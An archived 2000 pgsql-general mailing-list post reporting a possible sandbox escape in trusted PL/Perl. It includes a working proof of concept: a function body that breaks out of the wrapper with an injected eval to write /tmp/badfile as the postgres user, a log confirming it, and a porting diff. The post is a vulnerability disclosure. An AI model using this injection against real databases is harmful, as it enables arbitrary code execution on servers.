possible security problem with PL/perl - Mailing list pgsql-general
From | ts |
---|---|
Subject | possible security problem with PL/perl |
Date | |
Msg-id | 200003060707.IAA23017@moulon.moulon.inra.fr Whole thread Raw |
List | pgsql-general |
I was looking the extension PL/Tcl and PL/perl for trying to write an extension for another language, when I've found a possible problem with PL/perl. My configuration : * PostgreSQL 6.5.3 * plperl extract from postgresql-7.0beta1.tar.gz * perl 5.005_03 At the end of this message, my modification to compile it under 6.5.3 if somebody want to verify it (modification of some constants only : FUNC_MAX_ARGS, PROCOID and TYPEOID) The file README say : ------------------------------------------------------------ -- here is one that will fail. Creating the function -- will work, but using it will fail. CREATE FUNCTION badfunc() RETURNS int4 AS ' open(TEMP, ">/tmp/badfile"); print TEMP "Gotcha!\n"; return 1; ' LANGUAGE 'plperl'; SELECT badfunc(); ------------------------------------------------------------ Here my example : ------------------------------------------------------------ aestivum% pwd /var/postgres/pl/plperl aestivum% ls -alg /tmp/badfile ls: /tmp/badfile: No such file or directory aestivum% cat README CREATE FUNCTION plperl_call_handler() RETURNS opaque AS '/var/postgres/pl/plperl/plperl.so' LANGUAGE 'C'; CREATE TRUSTED PROCEDURAL LANGUAGE 'plperl' HANDLER plperl_call_handler LANCOMPILER 'PL/Perl'; CREATE FUNCTION badfunc() RETURNS int4 AS ' } ]), eval( q[ sub { open(TEMP, ">/tmp/badfile"); print TEMP "Gotcha!\n"; return 1; ' LANGUAGE 'plperl'; SELECT badfunc(); aestivum% psql toto < README CREATE FUNCTION plperl_call_handler() RETURNS opaque AS '/var/postgres/pl/plperl/plperl.so' LANGUAGE 'C'; CREATE CREATE TRUSTED PROCEDURAL LANGUAGE 'plperl' HANDLER plperl_call_handler LANCOMPILER 'PL/Perl'; CREATE CREATE FUNCTION badfunc() RETURNS int4 AS ' } ]), eval( q[ sub { open(TEMP, ">/tmp/badfile"); print TEMP "Gotcha!\n"; return 1; ' LANGUAGE 'plperl'; CREATE SELECT badfunc(); badfunc ------- 1 (1 row) EOF aestivum% ls -alg /tmp/badfile -rw------- 1 postgres postgres 8 Mar 6 07:31 /tmp/badfile aestivum% aestivum% cat /tmp/badfile Gotcha! aestivum% ------------------------------------------------------------ There is no failure and the file is created. Someone can verify if this problem : 1) is real 2) still exist in postgres 7.0beta1 Thanks, Guy Decoux ps: I'm not subscribed to this mailing list ------------------------------------------------------------ aestivum% diff -u plperl.c~ plperl.c --- plperl.c~ Sun Feb 20 09:00:27 2000 +++ plperl.c Mon Mar 6 07:14:39 2000 @@ -86,10 +86,10 @@ Oid result_in_elem; int result_in_len; int nargs; - FmgrInfo arg_out_func[FUNC_MAX_ARGS]; - Oid arg_out_elem[FUNC_MAX_ARGS]; - int arg_out_len[FUNC_MAX_ARGS]; - int arg_is_rel[FUNC_MAX_ARGS]; + FmgrInfo arg_out_func[MAXFMGRARGS]; + Oid arg_out_elem[MAXFMGRARGS]; + int arg_out_len[MAXFMGRARGS]; + int arg_is_rel[MAXFMGRARGS]; SV* reference; } plperl_proc_desc; @@ -490,7 +490,7 @@ /************************************************************ * Lookup the pg_proc tuple by Oid ************************************************************/ - procTup = SearchSysCacheTuple(PROCOID, + procTup = SearchSysCacheTuple(PROOID, Object IdGetDatum(proinfo->fn_oid), 0, 0, 0); if (!HeapTupleIsValid(procTup)) @@ -505,7 +505,7 @@ * Get the required information for input conversion of the * return value. ************************************************************/ - typeTup = SearchSysCacheTuple(TYPEOID, + typeTup = SearchSysCacheTuple(TYPOID, ObjectIdGetDatum (procStruct->prorettype), 0, 0, 0); if (!HeapTupleIsValid(typeTup)) @@ -535,7 +535,7 @@ proc_internal_args[0] = '\0'; for (i = 0; i < proinfo->fn_nargs; i++) { - typeTup = SearchSysCacheTuple(TYPEOID, + typeTup = SearchSysCacheTuple(TYPOID, ObjectIdGetDatum(procStr uct->proargtypes[i]), 0, 0, 0); if (!HeapTupleIsValid(typeTup)) @@ -720,7 +720,7 @@ /************************************************************ * Lookup the pg_proc tuple by Oid ************************************************************/ - procTup = SearchSysCacheTuple(PROCOID, + procTup = SearchSysCacheTuple(PROOID, Object IdGetDatum(proinfo->fn_oid), 0, 0, 0); if (!HeapTupleIsValid(procTup)) @@ -1041,7 +1041,7 @@ * Lookup the attribute type in the syscache * for the input function ************************************************************/ - typeTup = SearchSysCacheTuple(TYPEOID, + typeTup = SearchSysCacheTuple(TYPOID, ObjectIdGetDatum(tupdesc->attrs[attnum - 1]->a tttypid), 0, 0, 0); if (!HeapTupleIsValid(typeTup)) @@ -2058,7 +2058,7 @@ * Lookup the attribute type in the syscache * for the output function ************************************************************/ - typeTup = SearchSysCacheTuple(TYPEOID, + typeTup = SearchSysCacheTuple(TYPOID, ObjectIdGetDatum(tupdesc->att rs[i]->atttypid), 0, 0, 0); if (!HeapTupleIsValid(typeTup)) @@ -2134,7 +2134,7 @@ * Lookup the attribute type in the syscache * for the output function ************************************************************/ - typeTup = SearchSysCacheTuple(TYPEOID, + typeTup = SearchSysCacheTuple(TYPOID, ObjectIdGetDatum(tupdesc->att rs[i]->atttypid), 0, 0, 0); if (!HeapTupleIsValid(typeTup)) aestivum% ------------------------------------------------------------
pgsql-general by date: